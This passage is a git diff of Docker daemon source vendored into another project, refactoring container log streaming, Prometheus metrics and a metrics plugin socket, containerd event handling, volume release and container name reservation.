+func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *types.ContainerLogsOptions) (messages <-chan *backend.LogMessage, isTTY bool, retErr error) { + lg := logrus.WithFields(logrus.Fields{ + "module": "daemon", + "method": "(*Daemon).ContainerLogs", + "container": containerName, + }) + + if !(config.ShowStdout || config.ShowStderr) { + return nil, false, errdefs.InvalidParameter(errors.New("You must choose at least one stream")) + } container, err := daemon.GetContainer(containerName) if err != nil { - return err + return nil, false, err } - if !(config.ShowStdout || config.ShowStderr) { - return fmt.Errorf("You must choose at least one stream") + if container.RemovalInProgress || container.Dead { + return nil, false, errdefs.Conflict(errors.New("can not get logs from container which is dead or marked for removal")) } - cLog, err := daemon.getLogger(container) + if container.HostConfig.LogConfig.Type == "none" { + return nil, false, logger.ErrReadLogsNotSupported{} + } + + cLog, cLogCreated, err := daemon.getLogger(container) if err != nil { - return err + return nil, false, err } + if cLogCreated { + defer func() { + if retErr != nil { + if err = cLog.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + } + }() + } + logReader, ok := cLog.(logger.LogReader) if !ok { - return logger.ErrReadLogsNotSupported + return nil, false, logger.ErrReadLogsNotSupported{} } - follow := config.Follow && container.IsRunning() + follow := config.Follow && !cLogCreated tailLines, err := strconv.Atoi(config.Tail) if err != nil { tailLines = -1 } - logrus.Debug("logs: begin stream") - var since time.Time if config.Since != "" { s, n, err := timetypes.ParseTimestamps(config.Since, 0) if err != nil { - return err + return nil, false, err } since = time.Unix(s, n) } + + var until time.Time + if config.Until != "" && config.Until != "0" { + s, n, err := timetypes.ParseTimestamps(config.Until, 0) + if err != nil { + return nil, 
false, err + } + until = time.Unix(s, n) + } + readConfig := logger.ReadConfig{ Since: since, + Until: until, Tail: tailLines, Follow: follow, } + logs := logReader.ReadLogs(readConfig) - wf := ioutils.NewWriteFlusher(config.OutStream) - defer wf.Close() - close(started) - wf.Flush() - - var outStream io.Writer - outStream = wf - errStream := outStream - if !container.Config.Tty { - errStream = stdcopy.NewStdWriter(outStream, stdcopy.Stderr) - outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) - } - - for { - select { - case err := <-logs.Err: - logrus.Errorf("Error streaming logs: %v", err) - return nil - case <-ctx.Done(): - logs.Close() - return nil - case msg, ok := <-logs.Msg: - if !ok { - logrus.Debug("logs: end stream") - logs.Close() - if cLog != container.LogDriver { - // Since the logger isn't cached in the container, which occurs if it is running, it - // must get explicitly closed here to avoid leaking it and any file handles it has. - if err := cLog.Close(); err != nil { - logrus.Errorf("Error closing logger: %v", err) - } + // past this point, we can't possibly return any errors, so we can just + // start a goroutine and return to tell the caller not to expect errors + // (if the caller wants to give up on logs, they have to cancel the context) + // this goroutine functions as a shim between the logger and the caller. + messageChan := make(chan *backend.LogMessage, 1) + go func() { + if cLogCreated { + defer func() { + if err = cLog.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + }() + } + // set up some defers + defer logs.Close() + + // close the messages channel. closing is the only way to signal above + // that we're doing with logs (other than context cancel i guess). + defer close(messageChan) + + lg.Debug("begin logs") + for { + select { + // i do not believe as the system is currently designed any error + // is possible, but we should be prepared to handle it anyway. 
if + // we do get an error, copy only the error field to a new object so + // we don't end up with partial data in the other fields + case err := <-logs.Err: + lg.Errorf("Error streaming logs: %v", err) + select { + case <-ctx.Done(): + case messageChan <- &backend.LogMessage{Err: err}: + } + return + case <-ctx.Done(): + lg.Debugf("logs: end stream, ctx is done: %v", ctx.Err()) + return + case msg, ok := <-logs.Msg: + // there is some kind of pool or ring buffer in the logger that + // produces these messages, and a possible future optimization + // might be to use that pool and reuse message objects + if !ok { + lg.Debug("end logs") + return + } + m := msg.AsLogMessage() // just a pointer conversion, does not copy data + + // there could be a case where the reader stops accepting + // messages and the context is canceled. we need to check that + // here, or otherwise we risk blocking forever on the message + // send. + select { + case <-ctx.Done(): + return + case messageChan <- m: } - return nil - } - logLine := msg.Line - if config.Details { - logLine = append([]byte(msg.Attrs.String()+" "), logLine...) - } - if config.Timestamps { - logLine = append([]byte(msg.Timestamp.Format(logger.TimeFormat)+" "), logLine...) 
- } - if msg.Source == "stdout" && config.ShowStdout { - outStream.Write(logLine) - } - if msg.Source == "stderr" && config.ShowStderr { - errStream.Write(logLine) } } - } + }() + return messageChan, container.Config.Tty, nil } -func (daemon *Daemon) getLogger(container *container.Container) (logger.Logger, error) { - if container.LogDriver != nil && container.IsRunning() { - return container.LogDriver, nil +func (daemon *Daemon) getLogger(container *container.Container) (l logger.Logger, created bool, err error) { + container.Lock() + if container.State.Running { + l = container.LogDriver } - return container.StartLogger(container.HostConfig.LogConfig) + container.Unlock() + if l == nil { + created = true + l, err = container.StartLogger() + } + return } // mergeLogConfig merges the daemon log config to the container's log config if the container's log driver is not specified. @@ -140,3 +192,18 @@ func (daemon *Daemon) mergeAndVerifyLogConfig(cfg *containertypes.LogConfig) err return logger.ValidateLogOpts(cfg.Type, cfg.Config) } + +func (daemon *Daemon) setupDefaultLogConfig() error { + config := daemon.configStore + if len(config.LogConfig.Config) > 0 { + if err := logger.ValidateLogOpts(config.LogConfig.Type, config.LogConfig.Config); err != nil { + return errors.Wrap(err, "failed to set log opts") + } + } + daemon.defaultLogConfig = containertypes.LogConfig{ + Type: config.LogConfig.Type, + Config: config.LogConfig.Config, + } + logrus.Debugf("Using default logging driver %s", daemon.defaultLogConfig.Type) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logs_test.go b/vendor/github.com/docker/docker/daemon/logs_test.go index 0c36299e09..a32691a80c 100644 --- a/vendor/github.com/docker/docker/daemon/logs_test.go +++ b/vendor/github.com/docker/docker/daemon/logs_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" diff --git a/vendor/github.com/docker/docker/daemon/metrics.go 
b/vendor/github.com/docker/docker/daemon/metrics.go index 69dbfd9378..f6961a3553 100644 --- a/vendor/github.com/docker/docker/daemon/metrics.go +++ b/vendor/github.com/docker/docker/daemon/metrics.go @@ -1,16 +1,29 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" -import "github.com/docker/go-metrics" +import ( + "sync" + + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/go-metrics" + "github.com/pkg/errors" + "github.com/prometheus/client_golang/prometheus" + "github.com/sirupsen/logrus" +) + +const metricsPluginType = "MetricsCollector" var ( containerActions metrics.LabeledTimer - imageActions metrics.LabeledTimer networkActions metrics.LabeledTimer - engineVersion metrics.LabeledGauge + engineInfo metrics.LabeledGauge engineCpus metrics.Gauge engineMemory metrics.Gauge healthChecksCounter metrics.Counter healthChecksFailedCounter metrics.Counter + + stateCtr *stateCounter ) func init() { @@ -25,18 +38,155 @@ func init() { } { containerActions.WithValues(a).Update(0) } + networkActions = ns.NewLabeledTimer("network_actions", "The number of seconds it takes to process each network action", "action") - engineVersion = ns.NewLabeledGauge("engine", "The version and commit information for the engine process", metrics.Unit("info"), + engineInfo = ns.NewLabeledGauge("engine", "The information related to the engine and the OS it is running on", metrics.Unit("info"), "version", "commit", "architecture", - "graph_driver", "kernel", - "os", + "graphdriver", + "kernel", "os", + "os_type", + "daemon_id", // ID is a randomly generated unique identifier (e.g. 
UUID4) ) engineCpus = ns.NewGauge("engine_cpus", "The number of cpus that the host system of the engine has", metrics.Unit("cpus")) engineMemory = ns.NewGauge("engine_memory", "The number of bytes of memory that the host system of the engine has", metrics.Bytes) healthChecksCounter = ns.NewCounter("health_checks", "The total number of health checks") healthChecksFailedCounter = ns.NewCounter("health_checks_failed", "The total number of failed health checks") - imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action") + + stateCtr = newStateCounter(ns.NewDesc("container_states", "The count of containers in various states", metrics.Unit("containers"), "state")) + ns.Add(stateCtr) + metrics.Register(ns) } + +type stateCounter struct { + mu sync.Mutex + states map[string]string + desc *prometheus.Desc +} + +func newStateCounter(desc *prometheus.Desc) *stateCounter { + return &stateCounter{ + states: make(map[string]string), + desc: desc, + } +} + +func (ctr *stateCounter) get() (running int, paused int, stopped int) { + ctr.mu.Lock() + defer ctr.mu.Unlock() + + states := map[string]int{ + "running": 0, + "paused": 0, + "stopped": 0, + } + for _, state := range ctr.states { + states[state]++ + } + return states["running"], states["paused"], states["stopped"] +} + +func (ctr *stateCounter) set(id, label string) { + ctr.mu.Lock() + ctr.states[id] = label + ctr.mu.Unlock() +} + +func (ctr *stateCounter) del(id string) { + ctr.mu.Lock() + delete(ctr.states, id) + ctr.mu.Unlock() +} + +func (ctr *stateCounter) Describe(ch chan<- *prometheus.Desc) { + ch <- ctr.desc +} + +func (ctr *stateCounter) Collect(ch chan<- prometheus.Metric) { + running, paused, stopped := ctr.get() + ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(running), "running") + ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(paused), "paused") + ch <- 
prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(stopped), "stopped") +} + +func (d *Daemon) cleanupMetricsPlugins() { + ls := d.PluginStore.GetAllManagedPluginsByCap(metricsPluginType) + var wg sync.WaitGroup + wg.Add(len(ls)) + + for _, plugin := range ls { + p := plugin + go func() { + defer wg.Done() + + adapter, err := makePluginAdapter(p) + if err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error creating metrics plugin adapater") + return + } + if err := adapter.StopMetrics(); err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error stopping plugin metrics collection") + } + }() + } + wg.Wait() + + if d.metricsPluginListener != nil { + d.metricsPluginListener.Close() + } +} + +type metricsPlugin interface { + StartMetrics() error + StopMetrics() error +} + +func makePluginAdapter(p plugingetter.CompatPlugin) (metricsPlugin, error) { // nolint: interfacer + if pc, ok := p.(plugingetter.PluginWithV1Client); ok { + return &metricsPluginAdapter{pc.Client(), p.Name()}, nil + } + + pa, ok := p.(plugingetter.PluginAddr) + if !ok { + return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", p)) + } + + if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", pa.Protocol()) + } + + addr := pa.Addr() + client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error creating metrics plugin client") + } + return &metricsPluginAdapter{client, p.Name()}, nil +} + +type metricsPluginAdapter struct { + c *plugins.Client + name string +} + +func (a *metricsPluginAdapter) StartMetrics() error { + type metricsPluginResponse struct { + Err string + } + var res metricsPluginResponse + if err := a.c.Call(metricsPluginType+".StartMetrics", nil, &res); err != nil { + return errors.Wrap(err, "could not start metrics plugin") + } + if res.Err != "" { + 
return errors.New(res.Err) + } + return nil +} + +func (a *metricsPluginAdapter) StopMetrics() error { + if err := a.c.Call(metricsPluginType+".StopMetrics", nil, nil); err != nil { + return errors.Wrap(err, "error stopping metrics collector") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/metrics_unix.go b/vendor/github.com/docker/docker/daemon/metrics_unix.go new file mode 100644 index 0000000000..452424e685 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/metrics_unix.go @@ -0,0 +1,60 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "net" + "net/http" + "path/filepath" + + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/plugin" + "github.com/docker/go-metrics" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" +) + +func (daemon *Daemon) listenMetricsSock() (string, error) { + path := filepath.Join(daemon.configStore.ExecRoot, "metrics.sock") + unix.Unlink(path) + l, err := net.Listen("unix", path) + if err != nil { + return "", errors.Wrap(err, "error setting up metrics plugin listener") + } + + mux := http.NewServeMux() + mux.Handle("/metrics", metrics.Handler()) + go func() { + http.Serve(l, mux) + }() + daemon.metricsPluginListener = l + return path, nil +} + +func registerMetricsPluginCallback(store *plugin.Store, sockPath string) { + store.RegisterRuntimeOpt(metricsPluginType, func(s *specs.Spec) { + f := plugin.WithSpecMounts([]specs.Mount{ + {Type: "bind", Source: sockPath, Destination: "/run/docker/metrics.sock", Options: []string{"bind", "ro"}}, + }) + f(s) + }) + store.Handle(metricsPluginType, func(name string, client *plugins.Client) { + // Use lookup since nothing in the system can really reference it, no need + // to protect against removal + p, err := store.Get(name, metricsPluginType, plugingetter.Lookup) + if err 
!= nil { + return + } + + adapter, err := makePluginAdapter(p) + if err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error creating plugin adapater") + } + if err := adapter.StartMetrics(); err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error starting metrics collector plugin") + } + }) +} diff --git a/vendor/github.com/docker/docker/daemon/metrics_unsupported.go b/vendor/github.com/docker/docker/daemon/metrics_unsupported.go new file mode 100644 index 0000000000..653c77fc32 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/metrics_unsupported.go @@ -0,0 +1,12 @@ +// +build windows + +package daemon // import "github.com/docker/docker/daemon" + +import "github.com/docker/docker/pkg/plugingetter" + +func registerMetricsPluginCallback(getter plugingetter.PluginGetter, sockPath string) { +} + +func (daemon *Daemon) listenMetricsSock() (string, error) { + return "", nil +} diff --git a/vendor/github.com/docker/docker/daemon/monitor.go b/vendor/github.com/docker/docker/daemon/monitor.go index ee0d1fcce0..5e740dd4fe 100644 --- a/vendor/github.com/docker/docker/daemon/monitor.go +++ b/vendor/github.com/docker/docker/daemon/monitor.go @@ -1,132 +1,212 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "errors" "fmt" "runtime" "strconv" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" + "github.com/docker/docker/container" "github.com/docker/docker/libcontainerd" "github.com/docker/docker/restartmanager" + "github.com/sirupsen/logrus" ) -// StateChanged updates daemon state changes from containerd -func (daemon *Daemon) StateChanged(id string, e libcontainerd.StateInfo) error { - c := daemon.containers.Get(id) - if c == nil { +func (daemon *Daemon) setStateCounter(c *container.Container) { + switch c.StateString() { + case "paused": + stateCtr.set(c.ID, "paused") + case "running": + stateCtr.set(c.ID, "running") + default: + 
stateCtr.set(c.ID, "stopped") + } +} + +// ProcessEvent is called by libcontainerd whenever an event occurs +func (daemon *Daemon) ProcessEvent(id string, e libcontainerd.EventType, ei libcontainerd.EventInfo) error { + c, err := daemon.GetContainer(id) + if c == nil || err != nil { return fmt.Errorf("no such container: %s", id) } - switch e.State { - case libcontainerd.StateOOM: + switch e { + case libcontainerd.EventOOM: // StateOOM is Linux specific and should never be hit on Windows if runtime.GOOS == "windows" { - return errors.New("Received StateOOM from libcontainerd on Windows. This should never happen.") + return errors.New("received StateOOM from libcontainerd on Windows. This should never happen") } + + c.Lock() + defer c.Unlock() daemon.updateHealthMonitor(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "oom") - case libcontainerd.StateExit: - // if container's AutoRemove flag is set, remove it after clean up - autoRemove := func() { - if c.HostConfig.AutoRemove { - if err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { - logrus.Errorf("can't remove container %s: %v", c.ID, err) - } + case libcontainerd.EventExit: + if int(ei.Pid) == c.Pid { + c.Lock() + _, _, err := daemon.containerd.DeleteTask(context.Background(), c.ID) + if err != nil { + logrus.WithError(err).Warnf("failed to delete container %s from containerd", c.ID) } - } - c.Lock() - c.StreamConfig.Wait() - c.Reset(false) + c.StreamConfig.Wait() + c.Reset(false) - restart, wait, err := c.RestartManager().ShouldRestart(e.ExitCode, false, time.Since(c.StartedAt)) - if err == nil && restart { - c.RestartCount++ - c.SetRestarting(platformConstructExitStatus(e)) - } else { - c.SetStopped(platformConstructExitStatus(e)) - defer autoRemove() - } + exitStatus := container.ExitStatus{ + ExitCode: int(ei.ExitCode), + ExitedAt: ei.ExitedAt, + OOMKilled: ei.OOMKilled, + } + 
restart, wait, err := c.RestartManager().ShouldRestart(ei.ExitCode, daemon.IsShuttingDown() || c.HasBeenManuallyStopped, time.Since(c.StartedAt)) + if err == nil && restart { + c.RestartCount++ + c.SetRestarting(&exitStatus) + } else { + if ei.Error != nil { + c.SetError(ei.Error) + } + c.SetStopped(&exitStatus) + defer daemon.autoRemove(c) + } + defer c.Unlock() // needs to be called before autoRemove - daemon.updateHealthMonitor(c) - attributes := map[string]string{ - "exitCode": strconv.Itoa(int(e.ExitCode)), - } - daemon.LogContainerEventWithAttributes(c, "die", attributes) - daemon.Cleanup(c) - - if err == nil && restart { - go func() { - err := <-wait - if err == nil { - if err = daemon.containerStart(c, "", "", false); err != nil { - logrus.Debugf("failed to restart container: %+v", err) + // cancel healthcheck here, they will be automatically + // restarted if/when the container is started again + daemon.stopHealthchecks(c) + attributes := map[string]string{ + "exitCode": strconv.Itoa(int(ei.ExitCode)), + } + daemon.LogContainerEventWithAttributes(c, "die", attributes) + daemon.Cleanup(c) + + if err == nil && restart { + go func() { + err := <-wait + if err == nil { + // daemon.netController is initialized when daemon is restoring containers. + // But containerStart will use daemon.netController segment. + // So to avoid panic at startup process, here must wait util daemon restore done. 
+ daemon.waitForStartupDone() + if err = daemon.containerStart(c, "", "", false); err != nil { + logrus.Debugf("failed to restart container: %+v", err) + } } - } - if err != nil { - c.SetStopped(platformConstructExitStatus(e)) - defer autoRemove() - if err != restartmanager.ErrRestartCanceled { - logrus.Errorf("restartmanger wait error: %+v", err) + if err != nil { + c.Lock() + c.SetStopped(&exitStatus) + c.Unlock() + defer daemon.autoRemove(c) + if err != restartmanager.ErrRestartCanceled { + logrus.Errorf("restartmanger wait error: %+v", err) + } } - } - }() - } + }() + } - defer c.Unlock() - if err := c.ToDisk(); err != nil { - return err + daemon.setStateCounter(c) + return c.CheckpointTo(daemon.containersReplica) } - return daemon.postRunProcessing(c, e) - case libcontainerd.StateExitProcess: - if execConfig := c.ExecCommands.Get(e.ProcessID); execConfig != nil { - ec := int(e.ExitCode) + + if execConfig := c.ExecCommands.Get(ei.ProcessID); execConfig != nil { + ec := int(ei.ExitCode) execConfig.Lock() defer execConfig.Unlock() execConfig.ExitCode = &ec execConfig.Running = false execConfig.StreamConfig.Wait() if err := execConfig.CloseStreams(); err != nil { - logrus.Errorf("%s: %s", c.ID, err) + logrus.Errorf("failed to cleanup exec %s streams: %s", c.ID, err) } // remove the exec command from the container's store only and not the // daemon's store so that the exec command can be inspected. 
- c.ExecCommands.Delete(execConfig.ID) + c.ExecCommands.Delete(execConfig.ID, execConfig.Pid) + attributes := map[string]string{ + "execID": execConfig.ID, + "exitCode": strconv.Itoa(ec), + } + daemon.LogContainerEventWithAttributes(c, "exec_die", attributes) } else { - logrus.Warnf("Ignoring StateExitProcess for %v but no exec command found", e) + logrus.WithFields(logrus.Fields{ + "container": c.ID, + "exec-id": ei.ProcessID, + "exec-pid": ei.Pid, + }).Warnf("Ignoring Exit Event, no such exec command found") } - case libcontainerd.StateStart, libcontainerd.StateRestore: - // Container is already locked in this case - c.SetRunning(int(e.Pid), e.State == libcontainerd.StateStart) - c.HasBeenManuallyStopped = false - c.HasBeenStartedBefore = true - if err := c.ToDisk(); err != nil { - c.Reset(false) - return err + case libcontainerd.EventStart: + c.Lock() + defer c.Unlock() + + // This is here to handle start not generated by docker + if !c.Running { + c.SetRunning(int(ei.Pid), false) + c.HasBeenManuallyStopped = false + c.HasBeenStartedBefore = true + daemon.setStateCounter(c) + + daemon.initHealthMonitor(c) + + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "start") } - daemon.initHealthMonitor(c) - daemon.LogContainerEvent(c, "start") - case libcontainerd.StatePause: - // Container is already locked in this case - c.Paused = true - if err := c.ToDisk(); err != nil { - return err + + case libcontainerd.EventPaused: + c.Lock() + defer c.Unlock() + + if !c.Paused { + c.Paused = true + daemon.setStateCounter(c) + daemon.updateHealthMonitor(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "pause") } - daemon.updateHealthMonitor(c) - daemon.LogContainerEvent(c, "pause") - case libcontainerd.StateResume: - // Container is already locked in this case - c.Paused = false - if err := c.ToDisk(); err != nil { - return err + case 
libcontainerd.EventResumed: + c.Lock() + defer c.Unlock() + + if c.Paused { + c.Paused = false + daemon.setStateCounter(c) + daemon.updateHealthMonitor(c) + + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "unpause") } - daemon.updateHealthMonitor(c) - daemon.LogContainerEvent(c, "unpause") } - return nil } + +func (daemon *Daemon) autoRemove(c *container.Container) { + c.Lock() + ar := c.HostConfig.AutoRemove + c.Unlock() + if !ar { + return + } + + var err error + if err = daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err == nil { + return + } + if c := daemon.containers.Get(c.ID); c == nil { + return + } + + if err != nil { + logrus.WithError(err).WithField("container", c.ID).Error("error removing container") + } +} diff --git a/vendor/github.com/docker/docker/daemon/monitor_linux.go b/vendor/github.com/docker/docker/daemon/monitor_linux.go deleted file mode 100644 index 09f5af50c6..0000000000 --- a/vendor/github.com/docker/docker/daemon/monitor_linux.go +++ /dev/null @@ -1,19 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" -) - -// platformConstructExitStatus returns a platform specific exit status structure -func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { - return &container.ExitStatus{ - ExitCode: int(e.ExitCode), - OOMKilled: e.OOMKilled, - } -} - -// postRunProcessing perfoms any processing needed on the container after it has stopped. 
-func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/monitor_solaris.go b/vendor/github.com/docker/docker/daemon/monitor_solaris.go deleted file mode 100644 index 5ccfada76a..0000000000 --- a/vendor/github.com/docker/docker/daemon/monitor_solaris.go +++ /dev/null @@ -1,18 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" -) - -// platformConstructExitStatus returns a platform specific exit status structure -func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { - return &container.ExitStatus{ - ExitCode: int(e.ExitCode), - } -} - -// postRunProcessing perfoms any processing needed on the container after it has stopped. -func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/monitor_windows.go b/vendor/github.com/docker/docker/daemon/monitor_windows.go deleted file mode 100644 index 9648b1b415..0000000000 --- a/vendor/github.com/docker/docker/daemon/monitor_windows.go +++ /dev/null @@ -1,46 +0,0 @@ -package daemon - -import ( - "fmt" - - "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" -) - -// platformConstructExitStatus returns a platform specific exit status structure -func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { - return &container.ExitStatus{ - ExitCode: int(e.ExitCode), - } -} - -// postRunProcessing perfoms any processing needed on the container after it has stopped. 
-func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { - if e.ExitCode == 0 && e.UpdatePending { - spec, err := daemon.createSpec(container) - if err != nil { - return err - } - - newOpts := []libcontainerd.CreateOption{&libcontainerd.ServicingOption{ - IsServicing: true, - }} - - copts, err := daemon.getLibcontainerdCreateOptions(container) - if err != nil { - return err - } - - if copts != nil { - newOpts = append(newOpts, copts...) - } - - // Create a new servicing container, which will start, complete the update, and merge back the - // results if it succeeded, all as part of the below function call. - if err := daemon.containerd.Create((container.ID + "_servicing"), "", "", *spec, container.InitializeStdio, newOpts...); err != nil { - container.SetExitCode(-1) - return fmt.Errorf("Post-run update servicing failed: %s", err) - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/mounts.go b/vendor/github.com/docker/docker/daemon/mounts.go index 1c11f86a80..383a38e7eb 100644 --- a/vendor/github.com/docker/docker/daemon/mounts.go +++ b/vendor/github.com/docker/docker/daemon/mounts.go @@ -1,11 +1,13 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "strings" + mounttypes "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" - volumestore "github.com/docker/docker/volume/store" + volumesservice "github.com/docker/docker/volume/service" ) func (daemon *Daemon) prepareMountPoints(container *container.Container) error { @@ -19,28 +21,33 @@ func (daemon *Daemon) prepareMountPoints(container *container.Container) error { func (daemon *Daemon) removeMountPoints(container *container.Container, rm bool) error { var rmErrors []string + ctx := context.TODO() for _, m := range container.MountPoints { - if m.Volume == nil { + if m.Type != mounttypes.TypeVolume || m.Volume == nil { continue } - 
daemon.volumes.Dereference(m.Volume, container.ID) - if rm { - // Do not remove named mountpoints - // these are mountpoints specified like `docker run -v :/foo` - if m.Spec.Source != "" { - continue - } - err := daemon.volumes.Remove(m.Volume) - // Ignore volume in use errors because having this - // volume being referenced by other container is - // not an error, but an implementation detail. - // This prevents docker from logging "ERROR: Volume in use" - // where there is another container using the volume. - if err != nil && !volumestore.IsInUse(err) { - rmErrors = append(rmErrors, err.Error()) - } + daemon.volumes.Release(ctx, m.Volume.Name(), container.ID) + if !rm { + continue + } + + // Do not remove named mountpoints + // these are mountpoints specified like `docker run -v :/foo` + if m.Spec.Source != "" { + continue + } + + err := daemon.volumes.Remove(ctx, m.Volume.Name()) + // Ignore volume in use errors because having this + // volume being referenced by other container is + // not an error, but an implementation detail. + // This prevents docker from logging "ERROR: Volume in use" + // where there is another container using the volume. 
+ if err != nil && !volumesservice.IsInUse(err) { + rmErrors = append(rmErrors, err.Error()) } } + if len(rmErrors) > 0 { return fmt.Errorf("Error removing volumes:\n%v", strings.Join(rmErrors, "\n")) } diff --git a/vendor/github.com/docker/docker/daemon/names.go b/vendor/github.com/docker/docker/daemon/names.go index 273d551513..6c31949777 100644 --- a/vendor/github.com/docker/docker/daemon/names.go +++ b/vendor/github.com/docker/docker/daemon/names.go @@ -1,20 +1,21 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/container" + "github.com/docker/docker/daemon/names" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/namesgenerator" - "github.com/docker/docker/pkg/registrar" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/utils" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( - validContainerNameChars = utils.RestrictedNameChars - validContainerNamePattern = utils.RestrictedNamePattern + validContainerNameChars = names.RestrictedNameChars + validContainerNamePattern = names.RestrictedNamePattern ) func (daemon *Daemon) registerName(container *container.Container) error { @@ -30,12 +31,8 @@ func (daemon *Daemon) registerName(container *container.Container) error { return err } container.Name = name - - if err := container.ToDiskLocking(); err != nil { - logrus.Errorf("Error saving container name to disk: %v", err) - } } - return daemon.nameIndex.Reserve(container.Name, container.ID) + return daemon.containersReplica.ReserveName(container.Name, container.ID) } func (daemon *Daemon) generateIDAndName(name string) (string, string, error) { @@ -60,28 +57,28 @@ func (daemon *Daemon) generateIDAndName(name string) (string, string, error) { func (daemon *Daemon) reserveName(id, name string) (string, error) { if !validContainerNamePattern.MatchString(strings.TrimPrefix(name, "/")) { - return "", 
fmt.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars) + return "", errdefs.InvalidParameter(errors.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars)) } if name[0] != '/' { name = "/" + name } - if err := daemon.nameIndex.Reserve(name, id); err != nil { - if err == registrar.ErrNameReserved { - id, err := daemon.nameIndex.Get(name) + if err := daemon.containersReplica.ReserveName(name, id); err != nil { + if err == container.ErrNameReserved { + id, err := daemon.containersReplica.Snapshot().GetID(name) if err != nil { logrus.Errorf("got unexpected error while looking up reserved name: %v", err) return "", err } - return "", fmt.Errorf("Conflict. The container name %q is already in use by container %s. You have to remove (or rename) that container to be able to reuse that name.", name, id) + return "", nameConflictError{id: id, name: name} } - return "", fmt.Errorf("error reserving name: %s, error: %v", name, err) + return "", errors.Wrapf(err, "error reserving name: %q", name) } return name, nil } func (daemon *Daemon) releaseName(name string) { - daemon.nameIndex.Release(name) + daemon.containersReplica.ReleaseName(name) } func (daemon *Daemon) generateNewName(id string) (string, error) { @@ -92,8 +89,8 @@ func (daemon *Daemon) generateNewName(id string) (string, error) { name = "/" + name } - if err := daemon.nameIndex.Reserve(name, id); err != nil { - if err == registrar.ErrNameReserved { + if err := daemon.containersReplica.ReserveName(name, id); err != nil { + if err == container.ErrNameReserved { continue } return "", err @@ -102,7 +99,7 @@ func (daemon *Daemon) generateNewName(id string) (string, error) { } name = "/" + stringid.TruncateID(id) - if err := daemon.nameIndex.Reserve(name, id); err != nil { + if err := daemon.containersReplica.ReserveName(name, id); err != nil { return "", err } return name, nil diff --git a/vendor/github.com/docker/docker/utils/names.go 
